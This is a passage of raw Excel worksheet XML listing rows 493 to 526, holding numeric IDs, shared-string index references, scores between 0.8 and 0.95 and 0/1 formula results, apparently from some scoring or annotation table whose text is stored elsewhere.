      <c r="C493" s="63" t="s">
        <v>1666</v>
      </c>
      <c r="D493" s="62" t="s">
        <v>1667</v>
      </c>
      <c r="E493" s="62" t="s">
        <v>1668</v>
      </c>
      <c r="F493" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G493" s="62">
        <v>0.95</v>
      </c>
      <c r="H493" s="64">
        <v>1.0</v>
      </c>
      <c r="I493" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J493" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K493" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L493" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O493" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="494">
      <c r="A494" s="62">
        <v>7451.0</v>
      </c>
      <c r="B494" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C494" s="63" t="s">
        <v>1669</v>
      </c>
      <c r="D494" s="62" t="s">
        <v>1670</v>
      </c>
      <c r="E494" s="62" t="s">
        <v>1671</v>
      </c>
      <c r="F494" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G494" s="62">
        <v>0.85</v>
      </c>
      <c r="H494" s="64">
        <v>1.0</v>
      </c>
      <c r="I494" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J494" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K494" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L494" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O494" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="495">
      <c r="A495" s="62">
        <v>7473.0</v>
      </c>
      <c r="B495" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C495" s="63" t="s">
        <v>1672</v>
      </c>
      <c r="D495" s="62" t="s">
        <v>1673</v>
      </c>
      <c r="E495" s="62" t="s">
        <v>1674</v>
      </c>
      <c r="F495" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G495" s="62">
        <v>0.9</v>
      </c>
      <c r="H495" s="64">
        <v>1.0</v>
      </c>
      <c r="I495" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J495" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K495" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L495" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O495" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="496">
      <c r="A496" s="62">
        <v>7501.0</v>
      </c>
      <c r="B496" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C496" s="63" t="s">
        <v>1675</v>
      </c>
      <c r="D496" s="62" t="s">
        <v>1676</v>
      </c>
      <c r="E496" s="62" t="s">
        <v>1677</v>
      </c>
      <c r="F496" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G496" s="62">
        <v>0.9</v>
      </c>
      <c r="H496" s="64">
        <v>1.0</v>
      </c>
      <c r="I496" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J496" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K496" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L496" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O496" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="497">
      <c r="A497" s="62">
        <v>7511.0</v>
      </c>
      <c r="B497" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C497" s="63" t="s">
        <v>1678</v>
      </c>
      <c r="D497" s="62" t="s">
        <v>1679</v>
      </c>
      <c r="E497" s="62" t="s">
        <v>1680</v>
      </c>
      <c r="F497" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G497" s="62">
        <v>0.8</v>
      </c>
      <c r="H497" s="64">
        <v>1.0</v>
      </c>
      <c r="I497" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J497" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K497" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L497" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O497" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="498">
      <c r="A498" s="62">
        <v>7535.0</v>
      </c>
      <c r="B498" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C498" s="63" t="s">
        <v>1681</v>
      </c>
      <c r="D498" s="62" t="s">
        <v>1682</v>
      </c>
      <c r="E498" s="62" t="s">
        <v>1683</v>
      </c>
      <c r="F498" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G498" s="62">
        <v>0.9</v>
      </c>
      <c r="H498" s="64">
        <v>1.0</v>
      </c>
      <c r="I498" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J498" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K498" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L498" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O498" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="499">
      <c r="A499" s="62">
        <v>7848.0</v>
      </c>
      <c r="B499" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C499" s="63" t="s">
        <v>1684</v>
      </c>
      <c r="D499" s="62" t="s">
        <v>1685</v>
      </c>
      <c r="E499" s="62" t="s">
        <v>1686</v>
      </c>
      <c r="F499" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G499" s="62">
        <v>0.85</v>
      </c>
      <c r="H499" s="64">
        <v>1.0</v>
      </c>
      <c r="I499" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J499" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K499" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L499" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O499" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="500">
      <c r="A500" s="62">
        <v>9055.0</v>
      </c>
      <c r="B500" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C500" s="63" t="s">
        <v>1687</v>
      </c>
      <c r="D500" s="62" t="s">
        <v>1688</v>
      </c>
      <c r="E500" s="62" t="s">
        <v>1689</v>
      </c>
      <c r="F500" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G500" s="62">
        <v>0.9</v>
      </c>
      <c r="H500" s="64">
        <v>1.0</v>
      </c>
      <c r="I500" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J500" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K500" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L500" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O500" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="501">
      <c r="A501" s="62">
        <v>10608.0</v>
      </c>
      <c r="B501" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C501" s="63" t="s">
        <v>1690</v>
      </c>
      <c r="D501" s="62" t="s">
        <v>1691</v>
      </c>
      <c r="E501" s="62" t="s">
        <v>1692</v>
      </c>
      <c r="F501" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G501" s="62">
        <v>0.95</v>
      </c>
      <c r="H501" s="64">
        <v>1.0</v>
      </c>
      <c r="I501" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J501" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K501" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L501" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O501" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="502">
      <c r="A502" s="62">
        <v>183.0</v>
      </c>
      <c r="B502" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C502" s="63" t="s">
        <v>1693</v>
      </c>
      <c r="D502" s="62" t="s">
        <v>1694</v>
      </c>
      <c r="E502" s="62" t="s">
        <v>1695</v>
      </c>
      <c r="F502" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G502" s="62">
        <v>0.85</v>
      </c>
      <c r="H502" s="64">
        <v>1.0</v>
      </c>
      <c r="I502" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J502" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K502" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L502" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O502" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="503">
      <c r="A503" s="62">
        <v>1602.0</v>
      </c>
      <c r="B503" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C503" s="63" t="s">
        <v>1696</v>
      </c>
      <c r="D503" s="62" t="s">
        <v>1697</v>
      </c>
      <c r="E503" s="62" t="s">
        <v>1698</v>
      </c>
      <c r="F503" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G503" s="62">
        <v>0.85</v>
      </c>
      <c r="H503" s="64">
        <v>0.0</v>
      </c>
      <c r="I503" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J503" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K503" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L503" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O503" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="504">
      <c r="A504" s="62">
        <v>1731.0</v>
      </c>
      <c r="B504" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C504" s="63" t="s">
        <v>1699</v>
      </c>
      <c r="D504" s="62" t="s">
        <v>1700</v>
      </c>
      <c r="E504" s="62" t="s">
        <v>1701</v>
      </c>
      <c r="F504" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G504" s="62">
        <v>0.9</v>
      </c>
      <c r="H504" s="64">
        <v>1.0</v>
      </c>
      <c r="I504" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J504" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K504" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L504" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M504" s="62" t="s">
        <v>1702</v>
      </c>
      <c r="N504" s="62" t="s">
        <v>199</v>
      </c>
      <c r="O504" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="505">
      <c r="A505" s="62">
        <v>1738.0</v>
      </c>
      <c r="B505" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C505" s="63" t="s">
        <v>1703</v>
      </c>
      <c r="D505" s="62" t="s">
        <v>1704</v>
      </c>
      <c r="E505" s="62" t="s">
        <v>1705</v>
      </c>
      <c r="F505" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G505" s="62">
        <v>0.85</v>
      </c>
      <c r="H505" s="64">
        <v>0.0</v>
      </c>
      <c r="I505" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J505" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K505" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L505" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O505" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="506">
      <c r="A506" s="62">
        <v>1811.0</v>
      </c>
      <c r="B506" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C506" s="63" t="s">
        <v>1706</v>
      </c>
      <c r="D506" s="62" t="s">
        <v>1707</v>
      </c>
      <c r="E506" s="62" t="s">
        <v>1708</v>
      </c>
      <c r="F506" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G506" s="62">
        <v>0.85</v>
      </c>
      <c r="H506" s="64">
        <v>1.0</v>
      </c>
      <c r="I506" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J506" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K506" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L506" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O506" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="507">
      <c r="A507" s="62">
        <v>2532.0</v>
      </c>
      <c r="B507" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C507" s="63" t="s">
        <v>1709</v>
      </c>
      <c r="D507" s="62" t="s">
        <v>1710</v>
      </c>
      <c r="E507" s="62" t="s">
        <v>1711</v>
      </c>
      <c r="F507" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G507" s="62">
        <v>0.85</v>
      </c>
      <c r="H507" s="64">
        <v>1.0</v>
      </c>
      <c r="I507" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J507" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K507" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L507" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O507" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="508">
      <c r="A508" s="62">
        <v>2776.0</v>
      </c>
      <c r="B508" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C508" s="63" t="s">
        <v>1712</v>
      </c>
      <c r="D508" s="62" t="s">
        <v>1713</v>
      </c>
      <c r="E508" s="62" t="s">
        <v>1714</v>
      </c>
      <c r="F508" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G508" s="62">
        <v>0.85</v>
      </c>
      <c r="H508" s="64">
        <v>1.0</v>
      </c>
      <c r="I508" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J508" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K508" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L508" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O508" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="509">
      <c r="A509" s="62">
        <v>2777.0</v>
      </c>
      <c r="B509" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C509" s="63" t="s">
        <v>1715</v>
      </c>
      <c r="D509" s="62" t="s">
        <v>1716</v>
      </c>
      <c r="E509" s="62" t="s">
        <v>1717</v>
      </c>
      <c r="F509" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G509" s="62">
        <v>0.85</v>
      </c>
      <c r="H509" s="64">
        <v>1.0</v>
      </c>
      <c r="I509" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J509" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K509" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L509" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O509" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="510">
      <c r="A510" s="62">
        <v>3139.0</v>
      </c>
      <c r="B510" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C510" s="63" t="s">
        <v>1718</v>
      </c>
      <c r="D510" s="62" t="s">
        <v>1719</v>
      </c>
      <c r="E510" s="62" t="s">
        <v>1720</v>
      </c>
      <c r="F510" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G510" s="62">
        <v>0.8</v>
      </c>
      <c r="H510" s="64">
        <v>0.0</v>
      </c>
      <c r="I510" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J510" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K510" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L510" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O510" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="511">
      <c r="A511" s="62">
        <v>3174.0</v>
      </c>
      <c r="B511" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C511" s="63" t="s">
        <v>1721</v>
      </c>
      <c r="D511" s="62" t="s">
        <v>1722</v>
      </c>
      <c r="E511" s="62" t="s">
        <v>1723</v>
      </c>
      <c r="F511" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G511" s="62">
        <v>0.85</v>
      </c>
      <c r="H511" s="64">
        <v>1.0</v>
      </c>
      <c r="I511" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J511" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K511" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L511" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O511" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="512">
      <c r="A512" s="62">
        <v>3260.0</v>
      </c>
      <c r="B512" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C512" s="63" t="s">
        <v>1724</v>
      </c>
      <c r="D512" s="62" t="s">
        <v>1725</v>
      </c>
      <c r="E512" s="62" t="s">
        <v>1726</v>
      </c>
      <c r="F512" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G512" s="62">
        <v>0.85</v>
      </c>
      <c r="H512" s="64">
        <v>0.0</v>
      </c>
      <c r="I512" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J512" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K512" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L512" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O512" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="513">
      <c r="A513" s="62">
        <v>3376.0</v>
      </c>
      <c r="B513" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C513" s="63" t="s">
        <v>1727</v>
      </c>
      <c r="D513" s="62" t="s">
        <v>1728</v>
      </c>
      <c r="E513" s="62" t="s">
        <v>1729</v>
      </c>
      <c r="F513" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G513" s="62">
        <v>0.9</v>
      </c>
      <c r="H513" s="64">
        <v>1.0</v>
      </c>
      <c r="I513" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J513" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K513" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L513" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O513" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="514">
      <c r="A514" s="62">
        <v>3382.0</v>
      </c>
      <c r="B514" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C514" s="63" t="s">
        <v>1730</v>
      </c>
      <c r="D514" s="62" t="s">
        <v>1731</v>
      </c>
      <c r="E514" s="62" t="s">
        <v>1732</v>
      </c>
      <c r="F514" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G514" s="62">
        <v>0.9</v>
      </c>
      <c r="H514" s="64">
        <v>1.0</v>
      </c>
      <c r="I514" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J514" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K514" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L514" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O514" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="515">
      <c r="A515" s="62">
        <v>3411.0</v>
      </c>
      <c r="B515" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C515" s="63" t="s">
        <v>1733</v>
      </c>
      <c r="D515" s="62" t="s">
        <v>1734</v>
      </c>
      <c r="E515" s="62" t="s">
        <v>1735</v>
      </c>
      <c r="F515" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G515" s="62">
        <v>0.85</v>
      </c>
      <c r="H515" s="64">
        <v>0.0</v>
      </c>
      <c r="I515" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J515" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K515" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L515" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O515" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="516">
      <c r="A516" s="62">
        <v>3468.0</v>
      </c>
      <c r="B516" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C516" s="63" t="s">
        <v>1736</v>
      </c>
      <c r="D516" s="62" t="s">
        <v>1737</v>
      </c>
      <c r="E516" s="62" t="s">
        <v>1738</v>
      </c>
      <c r="F516" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G516" s="62">
        <v>0.8</v>
      </c>
      <c r="H516" s="64">
        <v>0.0</v>
      </c>
      <c r="I516" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J516" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K516" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L516" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O516" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="517">
      <c r="A517" s="62">
        <v>3584.0</v>
      </c>
      <c r="B517" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C517" s="63" t="s">
        <v>1739</v>
      </c>
      <c r="D517" s="62" t="s">
        <v>1740</v>
      </c>
      <c r="E517" s="62" t="s">
        <v>1741</v>
      </c>
      <c r="F517" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G517" s="62">
        <v>0.85</v>
      </c>
      <c r="H517" s="64">
        <v>1.0</v>
      </c>
      <c r="I517" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J517" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K517" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L517" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O517" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="518">
      <c r="A518" s="62">
        <v>3604.0</v>
      </c>
      <c r="B518" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C518" s="63" t="s">
        <v>1742</v>
      </c>
      <c r="D518" s="62" t="s">
        <v>1743</v>
      </c>
      <c r="E518" s="62" t="s">
        <v>1744</v>
      </c>
      <c r="F518" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G518" s="62">
        <v>0.9</v>
      </c>
      <c r="H518" s="64">
        <v>1.0</v>
      </c>
      <c r="I518" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J518" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K518" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L518" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O518" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="519">
      <c r="A519" s="62">
        <v>3630.0</v>
      </c>
      <c r="B519" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C519" s="63" t="s">
        <v>1745</v>
      </c>
      <c r="D519" s="62" t="s">
        <v>1746</v>
      </c>
      <c r="E519" s="62" t="s">
        <v>1747</v>
      </c>
      <c r="F519" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G519" s="62">
        <v>0.85</v>
      </c>
      <c r="H519" s="64">
        <v>1.0</v>
      </c>
      <c r="I519" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J519" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K519" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L519" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O519" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="520">
      <c r="A520" s="62">
        <v>3751.0</v>
      </c>
      <c r="B520" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C520" s="63" t="s">
        <v>1748</v>
      </c>
      <c r="D520" s="62" t="s">
        <v>1749</v>
      </c>
      <c r="E520" s="62" t="s">
        <v>1750</v>
      </c>
      <c r="F520" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G520" s="62">
        <v>0.9</v>
      </c>
      <c r="H520" s="64">
        <v>0.0</v>
      </c>
      <c r="I520" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J520" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K520" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L520" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O520" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="521">
      <c r="A521" s="62">
        <v>3946.0</v>
      </c>
      <c r="B521" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C521" s="63" t="s">
        <v>1751</v>
      </c>
      <c r="D521" s="62" t="s">
        <v>1752</v>
      </c>
      <c r="E521" s="62" t="s">
        <v>1753</v>
      </c>
      <c r="F521" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G521" s="62">
        <v>0.85</v>
      </c>
      <c r="H521" s="64">
        <v>1.0</v>
      </c>
      <c r="I521" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J521" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K521" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L521" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O521" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="522">
      <c r="A522" s="62">
        <v>4432.0</v>
      </c>
      <c r="B522" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C522" s="63" t="s">
        <v>1754</v>
      </c>
      <c r="D522" s="62" t="s">
        <v>1755</v>
      </c>
      <c r="E522" s="62" t="s">
        <v>1756</v>
      </c>
      <c r="F522" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G522" s="62">
        <v>0.9</v>
      </c>
      <c r="H522" s="64">
        <v>0.0</v>
      </c>
      <c r="I522" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J522" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K522" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L522" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O522" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="523">
      <c r="A523" s="62">
        <v>4548.0</v>
      </c>
      <c r="B523" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C523" s="63" t="s">
        <v>1757</v>
      </c>
      <c r="D523" s="62" t="s">
        <v>1758</v>
      </c>
      <c r="E523" s="62" t="s">
        <v>1759</v>
      </c>
      <c r="F523" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G523" s="62">
        <v>0.9</v>
      </c>
      <c r="H523" s="64">
        <v>1.0</v>
      </c>
      <c r="I523" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J523" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K523" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L523" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O523" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="524">
      <c r="A524" s="62">
        <v>4611.0</v>
      </c>
      <c r="B524" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C524" s="63" t="s">
        <v>1760</v>
      </c>
      <c r="D524" s="62" t="s">
        <v>1761</v>
      </c>
      <c r="E524" s="62" t="s">
        <v>1762</v>
      </c>
      <c r="F524" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G524" s="62">
        <v>0.85</v>
      </c>
      <c r="H524" s="64">
        <v>1.0</v>
      </c>
      <c r="I524" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J524" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K524" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L524" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O524" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="525">
      <c r="A525" s="62">
        <v>4621.0</v>
      </c>
      <c r="B525" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C525" s="63" t="s">
        <v>1763</v>
      </c>
      <c r="D525" s="62" t="s">
        <v>1764</v>
      </c>
      <c r="E525" s="62" t="s">
        <v>1765</v>
      </c>
      <c r="F525" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G525" s="62">
        <v>0.9</v>
      </c>
      <c r="H525" s="64">
        <v>1.0</v>
      </c>
      <c r="I525" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J525" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K525" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L525" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O525" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="526">
      <c r="A526" s="62">
        <v>4717.0</v>
      </c>
      <c r="B526" s="62" t="s">
        <v>72</v>
      </c>
      <c r="C526" s="63" t="s">
        <v>1766</v>
      </c>
      <c r="D526" s="62" t="s">
        <v>1767</v>
      </c>
      <c r="E526" s="62" t="s">
        <v>1768</v>
      </c>
      <c r="F526" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G526" s="62">
        <v>0.8</v>
      </c>
      <c r="H526" s="64">
        <v>0.0</v>
      </c>
      <c r="I526" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J526" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
